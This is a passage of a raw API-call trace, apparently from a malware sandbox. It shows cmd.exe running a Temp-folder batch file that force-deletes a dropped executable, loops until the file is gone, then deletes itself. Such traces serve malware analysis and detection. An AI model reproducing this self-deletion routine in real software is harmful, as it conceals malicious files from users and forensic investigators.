lpLCData="Sat") returned 4 [0338.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a554c00, cchData=32 | out: lpLCData="Sun") returned 4 [0338.175] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a554930, cchData=8 | out: lpLCData=".") returned 2 [0338.175] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a554920, cchData=8 | out: lpLCData=",") returned 2 [0338.175] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0338.176] GetConsoleTitleW (in: lpConsoleTitle=0x542e38, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0338.176] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x759c0000 [0338.176] GetProcAddress (hModule=0x759c0000, lpProcName="CopyFileExW") returned 0x759f3b92 [0338.176] GetProcAddress (hModule=0x759c0000, lpProcName="IsDebuggerPresent") returned 0x759d4a5d [0338.176] GetProcAddress (hModule=0x759c0000, lpProcName="SetConsoleInputExeNameW") returned 0x759ea79d [0338.179] _wcsicmp (_String1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat", _String2=")") returned 58 [0338.179] _wcsicmp (_String1="FOR", _String2="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat") returned 3 [0338.179] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat") returned 3 [0338.179] _wcsicmp (_String1="IF", _String2="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat") returned 6 [0338.179] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat") returned 6 [0338.179] _wcsicmp (_String1="REM", _String2="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat") returned 15 [0338.179] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat") returned 15 [0338.179] GetConsoleTitleW (in: lpConsoleTitle=0x1cf620, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0338.179] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0338.179] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0338.179] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf3dc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf3d4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf3d4*=0x705ba84c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0338.180] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0338.180] SetErrorMode (uMode=0x0) returned 0x0 [0338.180] SetErrorMode (uMode=0x1) returned 0x0 [0338.180] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x5307f8, lpFilePart=0x1cf140 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp", lpFilePart=0x1cf140*="Temp") returned 0x24 [0338.180] SetErrorMode (uMode=0x0) returned 0x1 [0338.180] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\.") returned 1 [0338.180] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a560640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0338.183] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0338.183] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat", fInfoLevelId=0x1, lpFindFileData=0x1ceedc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceedc) returned 0x543408 [0338.183] FindClose (in: hFindFile=0x543408 | out: hFindFile=0x543408) returned 1 [0338.183] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0338.183] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0338.183] GetConsoleTitleW (in: lpConsoleTitle=0x1cf3b4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0338.184] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77740000 [0338.184] GetProcAddress (hModule=0x77740000, lpProcName="SaferIdentifyLevel") returned 0x77762102 [0338.184] IdentifyCodeAuthzLevelW () returned 0x1 [0338.189] GetProcAddress (hModule=0x77740000, lpProcName="SaferComputeTokenFromLevel") returned 0x77763352 [0338.189] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0338.189] GetProcAddress (hModule=0x77740000, lpProcName="SaferCloseLevel") returned 0x77763825 [0338.189] CloseCodeAuthzLevel () returned 0x1 [0338.190] SetErrorMode (uMode=0x0) returned 0x0 [0338.190] SetErrorMode (uMode=0x1) returned 0x0 [0338.190] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat", nBufferLength=0x104, lpBuffer=0x5430b8, lpFilePart=0x1cf2a0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat", lpFilePart=0x1cf2a0*="upd9dba1b78.bat") returned 0x34 [0338.190] SetErrorMode (uMode=0x0) returned 0x1 [0338.190] CmdBatNotification () returned 0x54311e [0338.190] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upd9dba1b78.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cf2e4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0338.190] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0338.190] _get_osfhandle (_FileHandle=3) returned 0x78 [0338.190] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0338.190] _get_osfhandle (_FileHandle=3) returned 0x78 [0338.190] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0338.190] ReadFile (in: hFile=0x78, lpBuffer=0x4a556640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1cf2c8, lpOverlapped=0x0 | out: lpBuffer=0x4a556640*, lpNumberOfBytesRead=0x1cf2c8*=0xd8, lpOverlapped=0x0) returned 1 [0338.190] SetFilePointer (in: hFile=0x78, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0338.190] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a556640, cbMultiByte=11, lpWideCharStr=0x4a55c640, cchWideChar=8191 | out: lpWideCharStr="@echo off\r\n") returned 11 [0338.190] _get_osfhandle (_FileHandle=3) returned 0x78 [0338.190] GetFileType (hFile=0x78) returned 0x1 [0338.190] _get_osfhandle (_FileHandle=3) returned 0x78 [0338.190] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0338.191] _wcsicmp (_String1="echo", _String2=")") returned 60 [0338.191] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0338.191] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0338.191] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0338.191] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0338.191] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0338.191] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0338.192] _tell (_FileHandle=3) returned 11 [0338.192] _close (_FileHandle=3) returned 0 [0338.192] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0338.192] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0338.192] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0338.192] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0338.192] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0338.192] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0338.192] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0338.192] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0338.192] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0338.192] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0338.192] GetConsoleTitleW (in: lpConsoleTitle=0x1ceeac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0338.192] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0338.192] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0338.192] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0338.192] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0338.192] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0338.192] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0338.192] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0338.192] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0338.192] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0338.192] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0338.193] _wcsnicmp (_String1="off", _String2="off", _MaxCount=0x3) returned 0 [0338.193] _get_osfhandle (_FileHandle=1) returned 0x7 [0338.193] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0338.193] _get_osfhandle (_FileHandle=1) returned 0x7 [0338.193] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5541ac | out: lpMode=0x4a5541ac) returned 1 [0338.193] _get_osfhandle (_FileHandle=0) returned 0x3 [0338.193] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5541b0 | out: lpMode=0x4a5541b0) returned 1 [0338.193] SetConsoleInputExeNameW () returned 0x1 [0338.193] GetConsoleOutputCP () returned 0x1b5 [0338.193] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a554260 | out: lpCPInfo=0x4a554260) returned 1 [0338.193] SetThreadUILanguage (LangId=0x0) returned 0x409 [0338.193] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upd9dba1b78.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cf2e4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0338.193] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0338.194] _get_osfhandle (_FileHandle=3) returned 0x78 [0338.194] SetFilePointer (in: hFile=0x78, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0338.194] _get_osfhandle (_FileHandle=3) returned 0x78 [0338.194] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0338.194] ReadFile (in: hFile=0x78, lpBuffer=0x4a556640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1cf2c8, lpOverlapped=0x0 | out: lpBuffer=0x4a556640*, lpNumberOfBytesRead=0x1cf2c8*=0xcd, lpOverlapped=0x0) returned 1 [0338.194] SetFilePointer (in: hFile=0x78, lDistanceToMove=15, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf [0338.194] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a556640, cbMultiByte=4, lpWideCharStr=0x4a55c640, cchWideChar=8191 | out: lpWideCharStr=":d\r\no off\r\n") returned 4 [0338.194] _get_osfhandle (_FileHandle=3) returned 0x78 [0338.194] GetFileType (hFile=0x78) returned 0x1 [0338.194] _get_osfhandle (_FileHandle=3) returned 0x78 [0338.194] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf [0338.194] _tell (_FileHandle=3) returned 15 [0338.194] _close (_FileHandle=3) returned 0 [0338.194] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upd9dba1b78.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cf2e4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0338.194] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0338.194] _get_osfhandle (_FileHandle=3) returned 0x78 [0338.194] SetFilePointer (in: hFile=0x78, lDistanceToMove=15, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf [0338.195] _get_osfhandle (_FileHandle=3) returned 0x78 [0338.195] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf [0338.195] ReadFile (in: hFile=0x78, lpBuffer=0x4a556640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1cf2c8, lpOverlapped=0x0 | out: lpBuffer=0x4a556640*, lpNumberOfBytesRead=0x1cf2c8*=0xc9, lpOverlapped=0x0) returned 1 [0338.195] SetFilePointer (in: hFile=0x78, lDistanceToMove=81, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0338.195] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a556640, cbMultiByte=66, lpWideCharStr=0x4a55c640, cchWideChar=8191 | out: lpWideCharStr="del /F /Q \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe\"\r\n") returned 66 [0338.195] _get_osfhandle (_FileHandle=3) returned 0x78 [0338.195] GetFileType (hFile=0x78) returned 0x1 [0338.195] _get_osfhandle (_FileHandle=3) returned 0x78 [0338.195] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0338.195] _wcsicmp (_String1="del", _String2=")") returned 59 [0338.195] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0338.195] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0338.195] _wcsicmp (_String1="IF", _String2="del") returned 5 [0338.195] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0338.195] _wcsicmp (_String1="REM", _String2="del") returned 14 [0338.195] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0338.196] _tell (_FileHandle=3) returned 81 [0338.196] _close (_FileHandle=3) returned 0 [0338.196] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0338.196] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0338.196] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0338.196] GetConsoleTitleW (in: lpConsoleTitle=0x1ceeac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0338.198] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1cec64 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0338.198] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1cdcf4 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0338.198] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1cdf24, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1cdf28, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1cdf24*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0338.198] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0338.198] _wcsicmp (_String1="upde25b4796.exe", _String2=".") returned 71 [0338.198] _wcsicmp (_String1="upde25b4796.exe", _String2="..") returned 71 [0338.198] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upde25b4796.exe")) returned 0x80 [0338.198] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x554cb8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0338.198] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe", nBufferLength=0x104, lpBuffer=0x1ce348, lpFilePart=0x1ce330 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe", lpFilePart=0x1ce330*="upde25b4796.exe") returned 0x34 [0338.198] SetErrorMode (uMode=0x0) returned 0x1 [0338.198] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp")) returned 0x2010 [0338.198] _wcsicmp (_String1="upde25b4796.exe", _String2=".") returned 71 [0338.198] _wcsicmp (_String1="upde25b4796.exe", _String2="..") returned 71 [0338.198] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upde25b4796.exe")) returned 0x80 [0338.198] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe", fInfoLevelId=0x0, lpFindFileData=0x5551f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5551f4) returned 0x5559f8 [0338.198] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upde25b4796.exe")) returned 1 [0338.199] FindNextFileW (in: hFindFile=0x5559f8, lpFindFileData=0x5551f4 | out: lpFindFileData=0x5551f4) returned 0 [0338.199] GetLastError () returned 0x12 [0338.199] FindClose (in: hFindFile=0x5559f8 | out: hFindFile=0x5559f8) returned 1 [0338.200] _get_osfhandle (_FileHandle=1) returned 0x7 [0338.200] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0338.200] _get_osfhandle (_FileHandle=1) returned 0x7 [0338.200] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5541ac | out: lpMode=0x4a5541ac) returned 1 [0338.200] _get_osfhandle (_FileHandle=0) returned 0x3 [0338.200] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5541b0 | out: lpMode=0x4a5541b0) returned 1 [0338.200] SetConsoleInputExeNameW () returned 0x1 [0338.200] GetConsoleOutputCP () returned 0x1b5 [0338.200] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a554260 | out: lpCPInfo=0x4a554260) returned 1 [0338.200] SetThreadUILanguage (LangId=0x0) returned 0x409 [0338.200] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upd9dba1b78.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cf2e4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0338.200] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0338.200] _get_osfhandle (_FileHandle=3) returned 0x78 [0338.200] SetFilePointer (in: hFile=0x78, lDistanceToMove=81, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0338.201] _get_osfhandle (_FileHandle=3) returned 0x78 [0338.201] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0338.201] ReadFile (in: hFile=0x78, lpBuffer=0x4a556640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1cf2c8, lpOverlapped=0x0 | out: lpBuffer=0x4a556640*, lpNumberOfBytesRead=0x1cf2c8*=0x87, lpOverlapped=0x0) returned 1 [0338.201] SetFilePointer (in: hFile=0x78, lDistanceToMove=153, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x99 [0338.201] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a556640, cbMultiByte=72, lpWideCharStr=0x4a55c640, cchWideChar=8191 | out: lpWideCharStr="if exist \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe\" goto d\r\n") returned 72 [0338.201] _get_osfhandle (_FileHandle=3) returned 0x78 [0338.201] GetFileType (hFile=0x78) returned 0x1 [0338.201] _get_osfhandle (_FileHandle=3) returned 0x78 [0338.201] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x99 [0338.202] _tell (_FileHandle=3) returned 153 [0338.202] _close (_FileHandle=3) returned 0 [0338.202] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe", nBufferLength=0x208, lpBuffer=0x1ceea4, lpFilePart=0x1cec50 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe", lpFilePart=0x1cec50*="upde25b4796.exe") returned 0x34 [0338.202] wcsncmp (_String1="C:\\U", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0338.202] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upde25b4796.exe", fInfoLevelId=0x1, lpFindFileData=0x1cec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cec54) returned 0xffffffff [0338.202] GetLastError () returned 0x2 [0338.202] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0338.202] GetLastError () returned 0x6 [0338.202] _get_osfhandle (_FileHandle=1) returned 0x7 [0338.202] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0338.202] _get_osfhandle (_FileHandle=1) returned 0x7 [0338.202] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5541ac | out: lpMode=0x4a5541ac) returned 1 [0338.203] _get_osfhandle (_FileHandle=0) returned 0x3 [0338.203] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5541b0 | out: lpMode=0x4a5541b0) returned 1 [0338.203] SetConsoleInputExeNameW () returned 0x1 [0338.203] GetConsoleOutputCP () returned 0x1b5 [0338.203] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a554260 | out: lpCPInfo=0x4a554260) returned 1 [0338.203] SetThreadUILanguage (LangId=0x0) returned 0x409 [0338.203] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upd9dba1b78.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cf2e4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0338.203] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0338.203] _get_osfhandle (_FileHandle=3) returned 0x78 [0338.203] SetFilePointer (in: hFile=0x78, lDistanceToMove=153, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x99 [0338.203] _get_osfhandle (_FileHandle=3) returned 0x78 [0338.203] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x99 [0338.203] ReadFile (in: hFile=0x78, lpBuffer=0x4a556640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1cf2c8, lpOverlapped=0x0 | out: lpBuffer=0x4a556640*, lpNumberOfBytesRead=0x1cf2c8*=0x3f, lpOverlapped=0x0) returned 1 [0338.204] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a556640, cbMultiByte=63, lpWideCharStr=0x4a55c640, cchWideChar=8191 | out: lpWideCharStr="del /F \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat\"\r\n goto d\r\n") returned 63 [0338.204] _get_osfhandle (_FileHandle=3) returned 0x78 [0338.204] GetFileType (hFile=0x78) returned 0x1 [0338.204] _get_osfhandle (_FileHandle=3) returned 0x78 [0338.204] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd8 [0338.205] _tell (_FileHandle=3) returned 216 [0338.205] _close (_FileHandle=3) returned 0 [0338.205] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0338.205] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0338.205] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0338.205] GetConsoleTitleW (in: lpConsoleTitle=0x1ceeac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0338.205] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1cec64 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0338.205] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1cdcf4 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0338.205] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1cdf24, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1cdf28, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1cdf24*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0338.205] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0338.205] _wcsicmp (_String1="upd9dba1b78.bat", _String2=".") returned 71 [0338.205] _wcsicmp (_String1="upd9dba1b78.bat", _String2="..") returned 71 [0338.205] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upd9dba1b78.bat")) returned 0x2020 [0338.205] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x544358 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0338.205] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat", nBufferLength=0x104, lpBuffer=0x1ce348, lpFilePart=0x1ce330 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat", lpFilePart=0x1ce330*="upd9dba1b78.bat") returned 0x34 [0338.205] SetErrorMode (uMode=0x0) returned 0x1 [0338.205] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp")) returned 0x2010 [0338.205] _wcsicmp (_String1="upd9dba1b78.bat", _String2=".") returned 71 [0338.205] _wcsicmp (_String1="upd9dba1b78.bat", _String2="..") returned 71 [0338.205] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upd9dba1b78.bat")) returned 0x2020 [0338.206] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat", fInfoLevelId=0x0, lpFindFileData=0x544894, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x544894) returned 0x545098 [0338.206] DeleteFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\upd9dba1b78.bat")) returned 1 [0338.206] 